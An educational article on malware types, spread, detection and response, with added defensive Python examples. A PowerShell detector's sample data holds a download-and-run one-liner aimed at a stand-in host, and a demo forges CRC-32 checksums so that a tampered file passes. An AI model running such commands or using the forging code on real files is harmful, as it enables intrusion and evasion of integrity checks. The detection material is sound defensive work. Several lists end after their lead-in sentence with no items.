Malware, short for malicious software, is any software intentionally designed to harm, exploit, or otherwise compromise devices, networks, or data. Cybercriminals use malware to steal sensitive information, disrupt operations, gain unauthorized access, or demand ransoms from individuals or organizations.
Malware comes in many types, each with different goals, from minor annoyances to serious security threats. Worms spread on their own without any user input, viruses attach themselves to files and spread when users open them, and Trojans disguise themselves as legitimate software to get themselves installed.
Ransomware encrypts files and demands payment for the decryption key. Adware can shade into malvertising, which uses legitimate sites and ad networks to deliver harmful code. Newer threats like cryptojacking secretly mine cryptocurrency on a victim's computer. This range of malware, which also includes keyloggers and rootkits, highlights the need for layered cybersecurity measures.
Adware falls into two broad categories: strains that are merely annoying and strains that carry a malicious payload, a practice known as malvertising. Malvertising is typically delivered by injecting malicious code into legitimate websites or into the ads served on them through ad networks.
The primary objective of non-malicious adware is to generate revenue by pushing unwanted ads to users through ad networks. When a user of an infected computer performs certain actions, such as opening a browser, they are shown unwanted pop-ups and ads.
Malvertising is more insidious. It can be used to install additional malware (e.g., Trojan horses and spyware), redirect users' browsers to malicious websites, launch attacks such as browser exploits, or modify a system's settings to gain further access or perform other malicious activities.
Short for "robot networks," botnets are networks of infected computers (bots) that attackers control remotely through command-and-control (C2) servers. Botnets are versatile and resilient: operators use redundant C2 servers and relay traffic through the infected machines themselves, so taking down a single node does not disable the network.
Botnets are used for many malicious purposes. Threat actors use them to launch distributed denial-of-service (DDoS) attacks, send spam and phishing emails, steal credentials, exfiltrate data, and perpetrate click fraud. Well-known botnets include Mirai, Zeus, and Storm.
Cryptojacking co-opts the processing power of users' devices, without their knowledge or consent, to perform the calculations needed to mine cryptocurrency. It degrades device performance by consuming CPU and GPU cycles (browser-based miners keep running for as long as the page stays open). This not only raises energy costs through increased power consumption but can also shorten hardware life through sustained heat and load.
Fileless malware uses processes, applications, and tools already present in the operating system (for example, PowerShell, WMI, or the Windows registry) to execute its payload and persist in memory. Because it runs inside legitimate system processes and writes little or nothing to disk, it leaves a minimal footprint and is harder to detect than file-based malware.
Keyloggers capture a user's keystrokes. While there are some legitimate uses, such as monitoring employee activity, they are primarily used by cybercriminals to steal credentials or other sensitive information. Most keyloggers are software delivered by a Trojan horse, but some are hardware devices physically attached between the keyboard and the computer.
A logic bomb is like a digital time bomb: malicious code that activates only when specific criteria are met. The trigger can be a particular date or time (a time bomb), a count (e.g., the 10th login), or an event (e.g., a browser launch).
Logic bombs can remain dormant and are often hidden within legitimate software to evade detection. Once activated, logic bombs can execute nearly any malicious activity, from encrypting hard drives to deleting files.
Fileless malware attacks are cyberattacks that do not depend on traditional executable files to deliver and execute malicious code. Instead, they abuse legitimate software, processes, and vulnerabilities already present on the system to carry out their activities. This makes them harder to detect and remove because they leave behind none of the file-based signatures that antivirus solutions typically look for; detection has to rely on process behavior, command lines, and memory analysis instead.
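One concrete place to look for fileless activity is the command line of process-creation events: a PowerShell one-liner started with a hidden window and a base64-encoded command that, once decoded, downloads and runs a script in memory is a classic living-off-the-land pattern. The following is an added example, not code from the original page; the sample event lines are constructed, and the indicator list is an illustrative assumption rather than any vendor's signature.

```python
import base64
import re

# PowerShell accepts unambiguous prefixes of -EncodedCommand; these are the
# common spellings. The regex deliberately does not match "-ExecutionPolicy".
ENC_FLAG = re.compile(
    r"-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)

# Tokens common in "download and run in memory" one-liners.
# Constructed list for this example, not a vendor signature.
INDICATORS = (
    "IEX", "Invoke-Expression", "DownloadString", "FromBase64String",
    "-w hidden", "WindowStyle Hidden", "Net.WebClient", "Invoke-WebRequest",
)


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16: leave it for an analyst


def find_indicators(text: str):
    low = text.lower()
    return [tok for tok in INDICATORS if tok.lower() in low]


def analyze(cmdline: str) -> dict:
    """Classify one process-creation command line: decode, then look for indicators
    in both the raw command line and the decoded script."""
    decoded = decode_encoded_command(cmdline)
    hits = find_indicators(cmdline)
    if decoded:
        hits += [h for h in find_indicators(decoded) if h not in hits]
    return {"encoded": decoded is not None, "decoded": decoded, "indicators": hits}


def ps_encode(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines, as an EDR or Sysmon process-creation event
# would record them. The URL is a reserved example domain, not a real host.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -enc " + ps_encode(PAYLOAD),
    "powershell.exe -Command Get-Process",
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        r = analyze(line)
        print(r["encoded"], r["indicators"], (r["decoded"] or "")[:60])
```

Only the second event decodes to a script, and it is the only one carrying indicators; the first event uses a scripted file path and an execution-policy switch that the regex correctly ignores. In production the same logic is applied to Sysmon Event ID 1 or EDR telemetry rather than hard-coded strings.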
Explore the dangers of fileless malware attacks and why they are difficult to detect: What are fileless malware attacks?
Ransomware is among the most damaging malware, as WannaCry showed in May 2017 when it infected hundreds of thousands of computers in more than 150 countries within its first week in the wild. When executed, ransomware encrypts data and demands a ransom for the decryption key. Because it uses strong encryption, the data cannot be recovered without that key, leaving targeted systems unusable.
The anonymity afforded by cryptocurrency payments and the rise of ransomware-as-a-service, in which developers lease their ransomware and infrastructure to affiliates, have made ransomware highly accessible. Its use is widespread, with operators spanning individual cybercriminals, crime syndicates, and nation-state threat actors.
Remote access Trojans (RATs) descend from legitimate remote administration tools (e.g., for remote work and IT support) but are built for covert use by attackers. A RAT gives a remote user (the cybercriminal) control over a system, typically with administrative rights.
With that level of access, a threat actor can conduct nearly any action on the host. RATs are also difficult to detect because they hide from lists of running programs and tasks, or disguise their activity as that of legitimate programs.
A rootkit is a set of tools that hides an attacker's presence on a system while maintaining privileged (i.e., root-level) access, giving threat actors a back door. This lets the cybercriminal keep command and control over a computer for an extended period without being detected.
Rootkits are associated with advanced persistent threats (APTs) and can give the threat actor complete control over the infected computer. Once installed, they are used to monitor activity, steal information, and launch attacks. Rootkits were originally delivered via Trojan horses, but they are increasingly bundled with, or injected into, otherwise legitimate software and its installers.
Playing on users' fears, scareware displays alarming alerts to trick users into scams. For example, it often tells users their system is infected with malware, spoofing legitimate antivirus vendors, to trick them into paying for a "remedy."
Spyware is installed without users' knowledge. It collects information from infected systems, such as activities performed, financial data, credentials, communications, personal information, and browsing history, and sends it back to the cybercriminal. Keyloggers and some adware are forms of spyware, and bots frequently include spyware components as well.
A Trojan horse, or simply a Trojan, is malware designed to present itself as a legitimate program or file and trick users into installing it. Trojans are usually distributed using social engineering tactics like phishing. Once installed, a Trojan may act immediately or lie dormant until prompted by the threat actor responsible for it.
Trojans can be programmed to take any number of actions, from stealing sensitive data to establishing backdoor access to systems. While Trojans can cause significant damage (e.g., Emotet, which was active globally for the better part of a decade), unlike worms and viruses they are not designed to self-replicate.
A computer virus is designed to self-replicate by inserting its code into other files and spreading to other systems without users' knowledge. Because viruses are embedded in files, they are activated only when a user opens the host file.
Threat actors use viruses to perform malicious activities, such as shutting down systems, damaging, modifying, or deleting files, or granting unauthorized access. These actions can run immediately or be delayed so the virus spreads undetected first. The most common file types used to spread viruses are documents, spreadsheets, executables, archives (e.g., zip files), and HTML files.
Worms are one of the most common and most dangerous types of malware. They are especially dangerous because they replicate themselves across networks without attaching to a host program or requiring a user to run them. Another troublesome characteristic of worms is that they usually go undetected until enough copies exist to consume noticeable bandwidth or system resources.
While malware and exploits are commonly used in cyberattacks, they serve distinct roles and function differently. Malware is any software designed to damage, disrupt, steal, or gain unauthorized access to data and systems.
An exploit is code or a technique that takes advantage of a vulnerability or weakness in software, hardware, or a system to achieve malicious objectives. Exploits are not themselves malware but the means used to execute attacks, often delivering malware as part of the process: by abusing a security flaw, an exploit enables unauthorized actions such as code execution, which the attacker then uses to deploy malware.
Discover the differences between malware and exploits in detail: What is Malware vs. Exploits?
Malware's success depends on its effective distribution. Depending on the type of malware and its objectives, several distribution models are used, including the following.
Malware spread through a drive-by download is installed without a user's knowledge when they visit a website, which may be a legitimate site that has been compromised or a site set up by the attacker. The page typically exploits a vulnerability in the browser or one of its plug-ins to run the download.
A drive-by download can also occur when a user clicks a malicious link. In either case, files or software are downloaded and executed automatically to breach the user's system.
Man-in-the-middle (MitM) attacks occur when an attacker inserts themselves between two parties’ communication without their knowledge. Once communication interception has been established, cyber attackers can eavesdrop to steal sensitive information, alter messages, or impersonate one of the parties to trick users into executing a financial transaction (e.g., granting account access or transferring money).
A widely used type of man-in-the-middle attack is spoofing Wi-Fi networks, known as an evil twin attack. With this type of man-in-the-middle attack, victims are tricked into connecting to a Wi-Fi network managed by a threat actor.
Evil twins are popular among cybercriminals because they are easy to set up and operate. They are often deployed in public areas like airports or libraries and can be run from a smartphone or other mobile device using readily available tooling.
Despite repeated warnings, users continue to fall for infected removable media schemes, in which devices loaded with malware are left where users will find them. Once the USB stick or other removable medium is connected to a system, the malware is installed, either automatically (through autorun features, or by a device that emulates a keyboard and types commands) or when the user opens a file stored on it.
Phishing attacks are one of the most widely used vectors for malware attacks. Malicious emails disguised as legitimate messages trick users into clicking malicious links or files. Once the user clicks, malware is delivered and installed.
File shares can be used to spread malware quickly through infected files stored on shared storage. Threat actors often abuse standard network file-sharing protocols such as SMB/CIFS and NFS to distribute malicious files. When users open an infected file, the malware executes and installs itself on their system.
Regardless of the type or method of distribution, malware has one overarching objective—to exploit devices to benefit a cyber attacker. The motivations behind these attacks vary, but several of the most common reasons malware is used are to:
In addition to alerts from anti-malware and antivirus software, a number of signs can indicate the presence of malware on a system. Common signs of a malware infection include:
Despite the best efforts of security teams, malware inevitably sneaks into organizations and impacts systems. Early detection of malware minimizes its spread and mitigates potential damage. Most organizations use a combination of techniques to detect malware, including the following.
Unlike blocklisting, which names the applications that may not run, application allowlisting requires administrators to specify the approved applications that can run on users' systems or the network; anything not on the allowlist is prevented from running because it is treated as a potential malware vector. Allowlists are usually expressed as cryptographic hashes, code-signing publishers, or trusted paths rather than file names, since a file name is trivial to spoof.
Machine learning (ML) and deep learning, both forms of artificial intelligence (AI), are increasingly used to detect malware based on behavior analysis. AI-powered tools analyze file and process behavior to identify patterns that indicate malware. These insights enable the detection of evolving and zero-day malware.
Checksums are a compact form of signature: a fixed-size value computed over a file that is compared against values recorded for known-good or known-bad files. A cyclic redundancy check (CRC) is a common checksum; its value depends on both the content and the position of every byte. Comparing short checksums rather than whole file contents makes signature matching cheap, but a database of known values is still needed. A CRC is designed to catch accidental corruption, not deliberate tampering: an attacker can make a modified file produce any CRC they choose, so for security decisions a cryptographic hash such as SHA-256 should be used instead. Other signature techniques that are sometimes grouped with checksums include reduced masks (matching selected bytes at known offsets), cryptanalysis of encrypted or packed malware bodies, statistical analysis, and heuristics.
File entropy detection tools measure the randomness of a file's bytes to spot packed or encrypted executables. Compressed or encrypted data has near-maximal entropy, whereas ordinary code and text do not, so a high-entropy section in an executable suggests a packer or crypter used to hide the real payload from signature scanning. This lets security teams flag polymorphic malware that changes its bytes frequently to evade detection, though legitimate compressed installers and encrypted resources trigger the same check and have to be tuned out.
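The checksum paragraph above warns that a CRC can be steered to any value, and the entropy paragraph describes a measurement; both claims are easy to demonstrate. The first block below is an added example, not code from the original page: it appends four bytes to a tampered file so that its CRC-32 matches the original's, then shows that SHA-256 still distinguishes the two. The file contents are constructed stand-ins.

```python
import hashlib
import zlib


def _crc32_table():
    """Standard reflected CRC-32 table (polynomial 0xEDB88320), as used by zlib."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _crc32_table()
# The top byte of each table entry is unique, which is what lets the CRC
# register be reversed one byte at a time.
_BY_TOP_BYTE = {entry >> 24: idx for idx, entry in enumerate(_TABLE)}
assert len(_BY_TOP_BYTE) == 256


def forge_crc32(data: bytes, target: int) -> bytes:
    """Append four bytes to data so that zlib.crc32(result) == target."""
    reg = zlib.crc32(data) ^ 0xFFFFFFFF   # CRC register after processing data
    want = target ^ 0xFFFFFFFF            # register we need after four more bytes
    # Walk backwards from the wanted register to find the table index used at each step.
    indices = []
    r = want
    for _ in range(4):
        idx = _BY_TOP_BYTE[r >> 24]
        indices.append(idx)
        r = ((r ^ _TABLE[idx]) << 8) & 0xFFFFFFFF
    # Walk forwards from the real register, picking the byte that selects each index.
    suffix = bytearray()
    for idx in reversed(indices):
        suffix.append((reg ^ idx) & 0xFF)
        reg = _TABLE[idx] ^ (reg >> 8)
    return data + bytes(suffix)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for a known-good installer and a trojanized copy of it.
ORIGINAL = b"MZ\x90\x00 constructed benign installer v1.0"
TAMPERED = b"MZ\x90\x00 constructed benign installer v1.0; plus malicious payload"


def demo():
    """Forge the tampered file's CRC-32 to equal the original's and compare hashes."""
    target = zlib.crc32(ORIGINAL)
    forged = forge_crc32(TAMPERED, target)
    return {
        "crc_matches": zlib.crc32(forged) == target,
        "sha256_matches": sha256_hex(forged) == sha256_hex(ORIGINAL),
    }


if __name__ == "__main__":
    print(demo())
```

The four trailing bytes are invisible to most file formats (trailing data after a PE or ZIP payload is routinely ignored), so a CRC-based integrity check passes while a SHA-256 check fails; that is the whole reason signature and allowlist databases store cryptographic hashes.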
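To make the entropy check concrete, here is an added example (not from the original page) that computes Shannon entropy per byte, profiles a file in fixed windows so that a packed section stands out from a plain header, and applies a simple threshold rule. The threshold, window size, and sample files are assumptions constructed for the example; the "packed" sample uses a SHA-256 chain as a deterministic stand-in for encrypted data.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_profile(data: bytes, window: int = 1024):
    """Entropy of each fixed-size window, so an encrypted body stands out from a stub."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def looks_packed(data: bytes, threshold: float = 7.0, window: int = 1024,
                 min_fraction: float = 0.5) -> bool:
    """True if at least min_fraction of the windows are above threshold.
    Threshold and fraction are tunable assumptions, not industry constants."""
    prof = entropy_profile(data, window)
    hot = sum(1 for e in prof if e >= threshold)
    return bool(prof) and hot / len(prof) >= min_fraction


def pseudo_random_bytes(n: int, seed: bytes = b"constructed sample") -> bytes:
    """Deterministic high-entropy bytes standing in for a packed or encrypted section."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed samples: ordinary text, and a "binary" with a 1 KiB plain stub
# followed by 4 KiB that looks encrypted, as a crypter would produce.
TEXT_SAMPLE = b"The quick brown fox jumps over the lazy dog. " * 100
_STUB = b"MZ\x90\x00" + (b"This program cannot be run in DOS mode.\r\n" * 25)[:1020]
PACKED_SAMPLE = _STUB + pseudo_random_bytes(4096)

if __name__ == "__main__":
    print("text:  ", round(shannon_entropy(TEXT_SAMPLE), 2), looks_packed(TEXT_SAMPLE))
    print("packed:", [round(e, 2) for e in entropy_profile(PACKED_SAMPLE)],
          looks_packed(PACKED_SAMPLE))
```

The windowed profile is what makes this usable in practice: a whole-file average hides a small encrypted payload inside a large benign installer, whereas per-window values show exactly where the high-entropy region begins.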
Malicious files used to deliver malware can be filtered by file extension. Blocking on extension alone is not foolproof, because legitimate files may be blocked and malicious ones renamed to sneak through, but it remains part of malware prevention programs. Blocklists can include any number or type of file; the most commonly blocked are executables (e.g., .exe) and macro-enabled Office documents (e.g., .xlsm).
Honeypots are decoys used to lure attackers and observe malware. They pose as legitimate applications, services, or APIs that attackers would target, so any interaction with them is suspicious by definition. Honeypots let security teams capture malware samples and attacker techniques in a controlled environment.
Dynamic monitoring for mass file operations, such as one process rapidly copying, renaming, overwriting, or deleting large numbers of files, can detect malware like ransomware while it runs. This rule-based approach helps security teams limit damage by identifying malware behavior early and tracing it back to the responsible process.
Recursive unpacking is used to uncover malware nested in content (e.g., archives within archives, files embedded in documents, and URLs) included in email messages, shared via cloud-based tools (e.g., collaboration and file sharing tools), or stored on cloud storage platforms. This approach detects malware even when it is deeply embedded and hidden.
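The mass-file-operation rule described above can be implemented as a sliding-window count per process, with the extension that renamed files acquire recorded so an analyst can see the ransomware's marker immediately. This is an added example rather than code from the original page; the log format and the event lines are constructed for the example (a real deployment would read EDR or Sysmon file events), and the threshold and window are assumptions to be tuned per environment.

```python
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta


# Constructed endpoint file-event log, one event per line, in time order:
#   <ISO timestamp> <pid> <process> <action> <path>[ -> <new path>]
def _build_sample_log():
    lines = [
        "2024-03-01T09:00:01 4120 explorer.exe rename C:\\Users\\a\\Docs\\q1.docx -> C:\\Users\\a\\Docs\\q1-final.docx",
        "2024-03-01T09:00:05 7788 svchost.exe write C:\\Windows\\Temp\\x.tmp",
        "2024-03-01T09:00:09 4120 explorer.exe delete C:\\Users\\a\\Docs\\old.txt",
    ]
    # One process overwriting and renaming 30 documents in 30 seconds (ransomware-like).
    t0 = datetime.fromisoformat("2024-03-01T09:05:00")
    for i in range(30):
        ts = (t0 + timedelta(seconds=i)).isoformat(timespec="seconds")
        lines.append(f"{ts} 9911 updater.exe write C:\\Users\\a\\Docs\\f{i}.docx")
        lines.append(f"{ts} 9911 updater.exe rename C:\\Users\\a\\Docs\\f{i}.docx -> C:\\Users\\a\\Docs\\f{i}.docx.locked")
    lines.append("2024-03-01T09:06:00 7788 svchost.exe write C:\\Windows\\Temp\\y.tmp")
    return lines


SAMPLE_LOG = _build_sample_log()


def parse_event(line: str):
    ts, pid, proc, action, path = line.split(" ", 4)
    return datetime.fromisoformat(ts), int(pid), proc, action, path


def new_extension(path: str):
    """For an 'old -> new' rename, return the extension of the new name ('' if none)."""
    if " -> " not in path:
        return None
    new = path.split(" -> ", 1)[1]
    name = new.rsplit("\\", 1)[-1]
    return name[name.rfind("."):] if "." in name else ""


def detect_mass_file_ops(lines, threshold=20, window_seconds=60,
                         watched=("write", "rename", "delete")):
    """Alert on any process with >= threshold watched operations inside a sliding
    window. Returns {pid: alert} recording the moment each process crossed the line."""
    recent = defaultdict(deque)        # pid -> timestamps still inside the window
    renamed_to = defaultdict(Counter)  # pid -> new extensions seen in renames
    alerts = {}
    for line in lines:
        ts, pid, proc, action, path = parse_event(line)
        if action not in watched:
            continue
        q = recent[pid]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=window_seconds):
            q.popleft()
        if action == "rename":
            renamed_to[pid][new_extension(path)] += 1
        if len(q) >= threshold and pid not in alerts:
            top = renamed_to[pid].most_common(1)
            ext, n = top[0] if top else (None, 0)
            alerts[pid] = {"process": proc, "ops_in_window": len(q), "first_alert": ts,
                           "top_new_ext": ext, "renames_to_top_ext": n}
    return alerts


if __name__ == "__main__":
    for pid, alert in detect_mass_file_ops(SAMPLE_LOG).items():
        print(pid, alert)
```

The benign noise (explorer.exe renaming a file, svchost.exe touching temp files) never accumulates enough events in a window, while updater.exe crosses the threshold nine seconds in and is already tagged with the ".locked" extension it is applying. Because the alert fires on the twentieth operation rather than after the fact, a responder can kill the process while most of the documents are still intact.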
Although it is limited to known types of malware, signature-based detection is widely used. This approach quickly and effectively detects a significant portion of malware, as most threat actors tend to use tried-and-true tools due to the complexity and expense of creating new malware.
Each known malware sample has a signature composed of hashes, file size, strings, indicators of compromise (IOCs), and other identifying characteristics. Signature-based detection tools continually scan systems for these known signatures. The trade-off is that a single changed byte produces a new hash, which is why signatures also rely on strings and code patterns that survive small modifications.
Static analysis tools examine a suspicious file's code to determine whether it contains malware without running it. If malware is suspected, dynamic analysis tools execute the code in an isolated area, or sandbox, and observe its behavior. Findings from both are turned into signatures and IOCs used to scan other systems for further instances of the malware.
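The following added example ties together the allowlisting paragraph and the signature paragraph above; it is not code from the original page. A signature made of a SHA-256 hash plus a string is matched against constructed stand-in files, and three policies are compared side by side: a hash-only blocklist, a blocklist with strings, and an allowlist keyed by hash. The point it makes is that appending one byte to the sample defeats the hash but not the string, and that the allowlist blocks the variant without knowing anything about it.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for files found on an endpoint (not real binaries).
FILES = {
    "notepad.exe":    b"MZ\x90\x00 constructed benign binary A",
    "backup.exe":     b"MZ\x90\x00 constructed benign binary B",
    "invoice.exe":    b"MZ\x90\x00 constructed malware sample; drop payload and beacon",
    "invoice_v2.exe": b"MZ\x90\x00 constructed malware sample; drop payload and beacon!",  # one byte appended
}

# A constructed signature for the sample: its exact hash plus a string that a
# repacked or lightly modified variant is likely to keep.
SIGNATURE = {
    "name": "Constructed.Sample",
    "sha256": {sha256_hex(FILES["invoice.exe"])},
    "strings": [b"drop payload and beacon"],
}

# Allowlist of approved binaries, keyed by hash rather than by file name.
ALLOWLIST = {sha256_hex(FILES["notepad.exe"]), sha256_hex(FILES["backup.exe"])}


def match_signature(data: bytes, sig=SIGNATURE):
    """Return which parts of the signature matched: 'sha256', 'string:...', or nothing."""
    hits = []
    if sha256_hex(data) in sig["sha256"]:
        hits.append("sha256")
    hits += ["string:" + s.decode() for s in sig["strings"] if s in data]
    return hits


def verdict_hash_only(data: bytes) -> str:
    """Hash-only blocklist: anything whose hash is not known-bad is allowed."""
    return "blocked-known-malware" if sha256_hex(data) in SIGNATURE["sha256"] else "allowed"


def verdict_blocklist(data: bytes) -> str:
    """Blocklist with hash and string signatures: still allows the unknown."""
    return "blocked-known-malware" if match_signature(data) else "allowed"


def verdict_allowlist(data: bytes) -> str:
    """Allowlist: only approved hashes run; everything else is denied by default."""
    if sha256_hex(data) in ALLOWLIST:
        return "allowed"
    return "blocked-known-malware" if match_signature(data) else "blocked-unknown"


def scan(files=FILES):
    """Verdict of each policy (hash-only, blocklist, allowlist) for every file."""
    return {name: (verdict_hash_only(d), verdict_blocklist(d), verdict_allowlist(d))
            for name, d in files.items()}


if __name__ == "__main__":
    for name, verdicts in scan().items():
        print(f"{name:16} hash-only={verdicts[0]:22} blocklist={verdicts[1]:22} allowlist={verdicts[2]}")
```

Real allowlists also accept code-signing publishers so that legitimate updates do not need a hash refresh for every build, and real signatures use many strings and byte patterns rather than one; the structure of the decision is the same.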
When security teams have an incident response plan, malware response and removal are expedited. A standard incident response plan for malware detection includes the following steps. As with any incident response plan, these steps should be customized and augmented to fit an organization’s resources and processes.
As soon as malware is detected, contain it. Isolate the infected system by disconnecting it from the network to prevent further spread, use security tools to terminate suspicious or malicious processes, and use antivirus/antimalware tools to remove the malware.
Malware indicators of compromise (IOCs) should be reviewed to determine the malware's type and the actions it took, which directs remediation efforts. This step also includes determining which other systems have been affected by the malware.
Based on the analysis of the IOCs, security teams need to triage the recovery efforts. This means prioritizing the malware response based on the scale of the malware incident and the importance of impacted systems relative to other open security incidents.
Anyone in the organization whose systems could have been infected with the malware should be notified and given clear instructions on how to facilitate the remediation efforts. If the malware results in a data breach, external parties must be notified according to compliance requirements.
If antivirus and antimalware tools do not remove it automatically, the malware must be removed from all impacted systems. The most reliable approach is to wipe infected systems, reinstall the operating system, and restore data from backup. Before restoring, confirm that the backup itself has not been infected.
Once the malware has been neutralized and systems restored, security teams must gather forensic evidence for the incident case file. This facilitates further investigation, meets compliance requirements, and supports legal actions.
Following a malware incident, security teams need to review what happened and assess how security systems performed to identify areas for improvement. In addition, lessons learned and information gathered about the malware should be integrated into detection databases and processes.
Combatting malware requires security teams to leverage a combination of tools and tactics. The following are several of the many that can be used to protect organizations from malware and prevent it from doing damage.
A fundamental tenet of Zero Trust security, the principle of least privilege, restricts users' access to only the minimum needed to perform their tasks, for only as long as necessary. This limits what malware can reach if it compromises a user's account or system.
Security awareness training should include sections on the social engineering tactics used to spread malware and best practices for avoiding becoming a victim. Periodic phishing simulations should evaluate users' understanding and their ability to identify phishing attacks. Training programs should be conducted at least annually, with ongoing communication and testing to reinforce key malware-related messages.
All systems should be continuously monitored to identify any unusual behavior that could be a sign of malware. This allows security teams to take steps to neutralize malware as quickly as possible.
Security policies should include specific directives to help users avoid malware traps. Examples of security directives that can help prevent malware attacks are rules about which systems must have antivirus and anti-malware software, requirements for software installation, and a removable media policy.
Organizations need comprehensive security tools to protect against cyber security threats, including malware. Tools that are proven to help protect systems from malware include:
Use network segmentation to divide the network into smaller segments that are partitioned using internal firewalls and access policies. This prevents lateral movement if malware infiltrates a segment. Micro-segmentation prevents the spread of malware and minimizes potential damage.
Regular security audits help security teams proactively identify and address vulnerabilities that malware can exploit. Particular attention should be paid to potential entry points for attacks, unused accounts and devices, and misconfigurations.
Because some malware deliberately targets backup systems, extra security measures are essential to protect them. Several proven approaches for securing backup data are creating an isolated environment with controlled access (e.g., air gapping or immutable storage), following the 3-2-1 backup rule (i.e., three copies of the data, on two different types of media, with one copy kept offsite), and using encryption to secure backups.
All user accounts must have strong, unique passwords that follow current best practices for length and uniqueness (periodic forced expiration is no longer recommended by NIST unless compromise is suspected). A secure password manager makes strong, unique passwords practical and avoids poor cyber hygiene (e.g., storing passwords in a contacts app or a plain text file) that malware can harvest.
Malware is continuously evolving and being created. Threat intelligence services can help ensure that security teams are aware of recent variants, attack tactics, and strategies to stop them.
A core best practice for preventing malware is installing system and software patches and updates promptly. This should include all operating systems, software tools, browsers, and plug-ins.
Multi-factor authentication (MFA), even basic two-factor authentication, adds a layer that makes it much harder for threat actors to use credentials stolen by malware. Even if malware (e.g., a keylogger) steals a user's password, the additional verification blocks the login. MFA is not absolute, however: infostealers that capture session cookies and phishing kits that relay codes in real time can bypass it, so phishing-resistant methods such as FIDO2 security keys are preferred for sensitive accounts.
Deep dive into malware variants and how to protect your organization: What is Malware Protection?
There are several types of malware, including:
Malware spreads through various methods, including:
Organizations can protect themselves from malware by implementing several security measures:
If your computer is infected with malware, you should:
If you think your computer has malware, you can report it to: